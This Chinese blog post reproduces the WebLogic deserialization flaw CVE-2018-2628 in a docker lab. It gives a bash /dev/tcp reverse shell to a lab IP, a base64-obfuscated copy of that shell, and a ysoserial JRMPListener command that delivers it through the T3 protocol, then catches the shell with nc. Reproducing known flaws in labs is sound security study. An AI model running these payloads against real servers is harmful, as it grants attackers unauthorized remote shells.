CVE-2018-2628

Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。

漏洞环境

cd weblogic/CVE-2018-2628
docker-compose up -d
docker-compose config

等待环境启动,访问http://10.10.10.8:7001/console

漏洞复现

下载ysoserial

weblogictool工具

bash -i >& /dev/tcp/10.10.10.128/4444 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}
  • 本地使用yso启动jrmp,工具中填入本地的jrmp地址
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections3 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"

img

img

  • nc监听反弹的shell
    img
    连接成功!!!
posted @   kalixcn  阅读(35)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
点击右上角即可分享
微信分享提示